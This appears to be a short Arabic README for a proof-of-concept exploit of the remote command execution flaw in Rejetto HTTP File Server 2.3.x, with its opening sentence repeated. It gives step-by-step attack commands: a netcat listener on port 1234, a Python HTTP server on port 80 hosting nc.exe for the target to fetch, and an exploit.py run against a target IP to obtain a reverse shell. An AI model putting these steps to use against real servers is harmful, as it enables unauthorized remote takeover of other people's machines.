
يحتوي هذا المستودع على شرح مفصّل وPoC عملي لثغرة تنفيذ الأوامر عن بُعد (Remote Command Execution) في Rejetto HTTP File Server (HFS) 2.3.x.
يحتوي هذا المستودع على شرح مفصّل وPoC عملي لثغرة تنفيذ الأوامر عن بُعد (Remote Command Execution) في خادم الملفات Rejetto HTTP File Server (HFS) 2.3.x.
أنشئ مستمعًا عبر netcat.
nc -lnvp 1234
غيّر عنوان IP الخاص بالمهاجم إلى عنوان IP والمنفذ الخاصين بك.

أنشئ أيضًا خادم ملفات HTTP في نفس المجلد الذي يوجد فيه nc.exe.
python -m http.server 80
python exploit.py <target-ip> <target-port>

ملاحظة: قد تحتاج إلى تشغيل الحمولة (payload) أكثر من مرة للحصول على قشرة عكسية (reverse shell).